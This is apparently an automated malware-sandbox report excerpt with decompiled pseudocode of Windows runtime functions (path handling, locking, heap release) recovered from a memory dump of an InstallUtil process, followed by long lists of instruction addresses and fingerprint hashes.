												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0130F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0130F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E012C52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E012DEB70(1, 0x13b79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E012DAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E013095D0();
																			L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0130B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01303D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0130B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x012e4128
0x012e4135
0x012e413c
0x012e4141
0x012e4145
0x012e4147
0x012e414e
0x012e4151
0x012e4159
0x012e415c
0x012e4160
0x012e4164
0x012e4168
0x012e416c
0x012e417f
0x012e4181
0x012e446a
0x012e446a
0x012e418c
0x012e4195
0x012e4199
0x012e4432
0x012e4439
0x012e443d
0x012e4442
0x012e4447
0x00000000
0x012e419f
0x012e41a3
0x012e41b1
0x012e41b9
0x012e41bd
0x012e45db
0x012e45db
0x00000000
0x012e41c3
0x012e41c3
0x012e41ce
0x012e41d4
0x0132e138
0x0132e13e
0x0132e169
0x0132e16d
0x0132e19e
0x0132e16f
0x0132e16f
0x0132e175
0x0132e179
0x0132e18f
0x0132e193
0x00000000
0x0132e199
0x00000000
0x0132e199
0x0132e193
0x00000000
0x00000000
0x00000000
0x012e41da
0x012e41da
0x012e41df
0x012e41e4
0x012e41ec
0x012e4203
0x012e4207
0x0132e1fd
0x012e4222
0x012e4226
0x0132e1f3
0x0132e1f3
0x012e422c
0x012e422c
0x012e4233
0x0132e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x012e4239
0x012e4239
0x012e4239
0x012e4239
0x012e4233
0x012e4226
0x012e41ee
0x012e41ee
0x012e41f4
0x012e4575
0x0132e1b1
0x0132e1b1
0x00000000
0x012e457b
0x012e457b
0x012e4582
0x0132e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x012e4588
0x012e4588
0x012e458c
0x0132e1c4
0x0132e1c4
0x00000000
0x012e4592
0x012e4592
0x012e4599
0x0132e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x012e459f
0x012e459f
0x012e45a3
0x0132e1d7
0x0132e1e4
0x00000000
0x012e45a9
0x012e45a9
0x012e45b0
0x0132e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x012e45b6
0x012e45b6
0x012e45b6
0x00000000
0x012e45b6
0x012e45b0
0x012e45a3
0x012e4599
0x012e458c
0x012e4582
0x00000000
0x00000000
0x00000000
0x00000000
0x012e41f4
0x012e423e
0x012e4241
0x012e45c0
0x012e45c4
0x00000000
0x012e45ca
0x012e45ca
0x00000000
0x0132e207
0x0132e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x012e45d1
0x00000000
0x00000000
0x012e45ca
0x00000000
0x012e4247
0x012e4247
0x012e4247
0x012e4249
0x012e4249
0x012e4249
0x012e4251
0x012e4251
0x012e4257
0x012e425f
0x012e426e
0x012e4270
0x012e427a
0x0132e219
0x0132e219
0x012e4280
0x012e4282
0x012e4456
0x012e45ea
0x00000000
0x012e45f0
0x0132e223
0x00000000
0x0132e223
0x012e445c
0x012e445c
0x00000000
0x012e445c
0x00000000
0x012e4288
0x012e428c
0x0132e298
0x012e4292
0x012e4292
0x012e429e
0x012e42a3
0x012e42a7
0x012e42ac
0x0132e22d
0x012e42b2
0x012e42b2
0x012e42b9
0x012e42bc
0x012e42c2
0x012e42ca
0x012e42cd
0x012e42cd
0x012e42d4
0x012e433f
0x012e433f
0x012e42d6
0x012e42d6
0x012e42d9
0x012e42dd
0x012e42eb
0x0132e23a
0x012e42f1
0x012e4305
0x012e430d
0x012e4315
0x012e4318
0x012e431f
0x012e4322
0x012e432e
0x012e433b
0x012e433b
0x00000000
0x012e432e
0x012e42eb
0x012e434c
0x012e434e
0x012e4352
0x012e4359
0x012e435e
0x012e4361
0x012e436e
0x012e438a
0x012e438e
0x012e4396
0x012e439e
0x012e43a1
0x012e43ad
0x012e43bb
0x012e43bb
0x012e43ad
0x012e436e
0x012e43bf
0x012e43c5
0x012e4463
0x012e4463
0x012e43ce
0x012e43d5
0x012e43d9
0x012e43df
0x012e4475
0x012e4479
0x012e4491
0x012e4491
0x012e4479
0x012e43e5
0x012e43eb
0x012e43f4
0x012e43f6
0x012e43f9
0x012e43fc
0x012e43ff
0x012e44e8
0x012e44ed
0x012e44f3
0x0132e247
0x00000000
0x012e44f9
0x012e4504
0x012e4508
0x012e450f
0x0132e269
0x00000000
0x012e4515
0x012e4519
0x012e4531
0x012e4534
0x012e4537
0x012e453e
0x012e4541
0x012e454a
0x0132e255
0x0132e255
0x0132e25b
0x0132e25e
0x0132e261
0x0132e261
0x012e4555
0x012e4559
0x012e455d
0x0132e26d
0x0132e270
0x0132e274
0x0132e27a
0x0132e27d
0x0132e28e
0x0132e28e
0x012e4563
0x012e4563
0x012e4569
0x012e4569
0x00000000
0x012e455d
0x012e450f
0x00000000
0x012e44f3
0x012e43ff
0x012e4405
0x012e4405
0x012e4405
0x012e42ac
0x012e428c
0x012e4282
0x012e4407
0x012e440d
0x0132e2af
0x0132e2af
0x012e4413
0x012e4413
0x00000000
0x012e41d4
0x00000000
0x012e41c3
0x012e41bd
0x012e4415
0x012e4415
0x012e4416
0x012e4417
0x012e4429
0x012e416e
0x012e416e
0x012e4175
0x012e4498
0x012e449f
0x0132e12d
0x00000000
0x0132e133
0x00000000
0x0132e133
0x012e44a5
0x012e44a5
0x012e44aa
0x00000000
0x012e44bb
0x012e44ca
0x012e44d6
0x012e44d7
0x012e44d8
0x012e44e3
0x012e44e3
0x012e44aa
0x012e417b
0x012e417b
0x012e417b
0x00000000
0x012e417b
0x012e4175
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 868c3ad9a2544164613e437a274261403c3b06bac6b19b697e2bea98abe73616
Instruction ID: dce5a594fddad1ec4f5527fda3194c9b93c9fc1bcc2d18f845708fa60f4c5817
Opcode Fuzzy Hash: 868c3ad9a2544164613e437a274261403c3b06bac6b19b697e2bea98abe73616
Instruction Fuzzy Hash: 73F1B0706283528FC724EF18C485A7AB7E1FF99718F94492EF586CB291E734D881CB52

Uniqueness

Uniqueness Score: -1.00%

Function 012F20A0 Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E012F20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x13b8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E012F2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E012F2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E012C58EC(_t240);
									_t221 =  *0x13b5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x13b5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01304A2C(0x13b6e40, 0x1304b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E012E7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x12a5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E012FF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E012FF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01347016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L012E2400(_t267 + 0x20);
															}
															L012E2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E012F2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E012E2280(_t134, 0x13b8608);
									__eflags =  *0x13b6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E012DFFB0(_t198, _t241, 0x13b8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x13b6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x13b8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E012F6B90(_t210,  &_v64);
										_t262 =  *0x13b8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E012FE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E013097C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0130006A(0x13b8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x13b8608);
												E0130B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x13b6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x13b6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E012DFFB0(_t198, _t240, 0x13b8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E013000C2(0x13b8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x012f20a0
0x012f20a8
0x012f20ad
0x012f20b3
0x012f20b8
0x012f20c2
0x012f20c7
0x012f20cb
0x012f20d2
0x012f2263
0x012f2266
0x01335836
0x01335836
0x00000000
0x012f226c
0x012f226c
0x012f2270
0x012f2274
0x012f20e2
0x012f20e2
0x012f20e6
0x012f20ee
0x013357dc
0x013357de
0x013357ec
0x013357ec
0x013357f1
0x013357f3
0x013357f8
0x00000000
0x013357f8
0x013357e0
0x013357e4
0x013357ea
0x00000000
0x00000000
0x00000000
0x013357ea
0x012f20f4
0x012f20f4
0x012f20f8
0x012f20f8
0x012f20fc
0x012f2100
0x012f2106
0x012f2201
0x012f2206
0x012f220b
0x012f220e
0x012f22a9
0x012f22ac
0x00000000
0x00000000
0x012f22b2
0x012f22b5
0x01335801
0x01335806
0x00000000
0x00000000
0x01335810
0x01335815
0x01335818
0x00000000
0x00000000
0x0133581e
0x012f22bb
0x012f22bb
0x012f2218
0x012f2218
0x012f221c
0x012f2220
0x012f2222
0x012f22c2
0x012f22c4
0x012f22dc
0x012f22dc
0x012f22e1
0x00000000
0x00000000
0x00000000
0x012f22e7
0x012f22c8
0x012f22cd
0x012f22d3
0x012f22d6
0x01335823
0x01335825
0x01335827
0x00000000
0x00000000
0x0133582d
0x00000000
0x0133582d
0x00000000
0x012f2228
0x012f2228
0x00000000
0x012f2228
0x012f2222
0x012f2214
0x012f2214
0x00000000
0x012f2114
0x012f2114
0x012f2114
0x012f211a
0x012f211c
0x012f2348
0x012f234d
0x01335840
0x01335845
0x01335848
0x0133584e
0x0133584e
0x01335848
0x012f2353
0x012f2355
0x012f2388
0x012f2388
0x012f2368
0x012f236a
0x012f236c
0x012f238f
0x00000000
0x012f236e
0x012f236e
0x012f218e
0x012f218e
0x012f2191
0x012f2195
0x01335a03
0x01335a06
0x01335a0c
0x01335a0f
0x01335a11
0x01335a13
0x01335a13
0x01335a19
0x01335a1f
0x00000000
0x012f219b
0x012f219b
0x012f21a0
0x012f2282
0x012f2284
0x012f2284
0x012f2284
0x012f2284
0x012f21a6
0x012f21a9
0x012f21ac
0x012f21ae
0x012f21b3
0x012f228b
0x012f2290
0x012f2379
0x012f2296
0x012f2298
0x012f2298
0x012f2290
0x012f21b9
0x012f21be
0x012f22a2
0x012f22a2
0x012f21c4
0x012f21c8
0x012f21cc
0x012f21d0
0x012f21d4
0x012f21de
0x012f21e3
0x01335a29
0x01335a2c
0x00000000
0x00000000
0x01335a3b
0x00000000
0x012f21e9
0x012f21e9
0x012f21e9
0x012f21ee
0x012f21f1
0x01335a45
0x01335a4b
0x01335a52
0x01335a58
0x01335a5d
0x01335a5f
0x01335a71
0x01335a61
0x01335a6a
0x01335a6a
0x01335a76
0x01335a79
0x01335a7f
0x01335a83
0x01335a85
0x01335a87
0x01335a87
0x01335a8c
0x01335a91
0x01335a97
0x01335a9f
0x01335aa0
0x01335aa1
0x01335aa6
0x01335aab
0x01335ab1
0x01335ab3
0x01335ab9
0x01335aca
0x01335ad4
0x01335ad4
0x01335ade
0x01335ade
0x01335aab
0x01335a79
0x01335a52
0x012f21f7
0x012f21f9
0x012f21fe
0x012f21fe
0x012f21e3
0x012f2195
0x012f236c
0x012f2122
0x012f2122
0x012f2124
0x012f2231
0x012f2236
0x012f2236
0x012f2238
0x012f2238
0x012f2240
0x012f2242
0x012f2244
0x013359fc
0x012f218c
0x012f218c
0x00000000
0x012f218c
0x012f224a
0x012f224f
0x012f2256
0x012f2304
0x012f2309
0x012f230f
0x012f231e
0x012f231e
0x012f231e
0x012f2320
0x012f2325
0x012f232a
0x012f232c
0x012f233e
0x012f233e
0x00000000
0x012f232c
0x012f2311
0x012f2317
0x012f231a
0x012f231c
0x012f2380
0x012f2380
0x012f2380
0x012f2384
0x00000000
0x00000000
0x012f2386
0x00000000
0x012f231c
0x012f225c
0x012f225c
0x00000000
0x012f225c
0x012f212a
0x012f2134
0x012f2138
0x012f213d
0x01335858
0x01335863
0x01335863
0x01335867
0x0133586a
0x00000000
0x00000000
0x0133586c
0x0133586c
0x01335871
0x01335875
0x01335877
0x01335997
0x0133599c
0x013359a1
0x013359a7
0x013359a7
0x00000000
0x013359a7
0x0133587d
0x00000000
0x0133588b
0x0133588b
0x01335890
0x01335892
0x01335894
0x01335899
0x0133589b
0x013358a0
0x013358a0
0x013358aa
0x013358b2
0x013358b6
0x013358be
0x013358c6
0x013358c9
0x0133590d
0x01335917
0x0133591a
0x0133591c
0x01335920
0x01335928
0x0133592a
0x0133592c
0x0133592e
0x0133592e
0x013358cb
0x013358cd
0x013358d8
0x013358e0
0x013358f4
0x013358fe
0x013358fe
0x0133593a
0x0133593e
0x01335940
0x01335942
0x00000000
0x01335944
0x01335944
0x01335949
0x0133594e
0x0133594e
0x01335953
0x0133595b
0x01335976
0x01335976
0x0133597a
0x0133597f
0x00000000
0x00000000
0x00000000
0x00000000
0x01335981
0x01335981
0x01335981
0x01335983
0x01335988
0x0133598d
0x01335991
0x01335991
0x00000000
0x0133595d
0x0133595d
0x01335963
0x01335965
0x00000000
0x00000000
0x00000000
0x00000000
0x01335967
0x01335967
0x0133596b
0x0133596d
0x00000000
0x00000000
0x0133596f
0x01335971
0x01335971
0x01335974
0x00000000
0x00000000
0x00000000
0x01335974
0x00000000
0x01335967
0x0133595b
0x01335942
0x01335863
0x012f2143
0x012f2143
0x012f2149
0x012f214f
0x012f22f1
0x012f22f6
0x00000000
0x012f2173
0x012f2173
0x012f217d
0x012f2181
0x012f2186
0x013359ae
0x013359b2
0x013359b5
0x013359b7
0x013359ba
0x013359cd
0x013359d1
0x013359d5
0x013359d9
0x013359db
0x00000000
0x00000000
0x013359dd
0x013359dd
0x013359e1
0x013359e4
0x013359e7
0x013359ee
0x013359ee
0x013359f3
0x013359f3
0x00000000
0x012f2186
0x012f214f
0x012f2106
0x012f2266
0x012f20d8
0x012f20da
0x012f20e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b6423d918636b8d9e50b92f19aabce898b605562288fb1fffbba2e4d1872fb
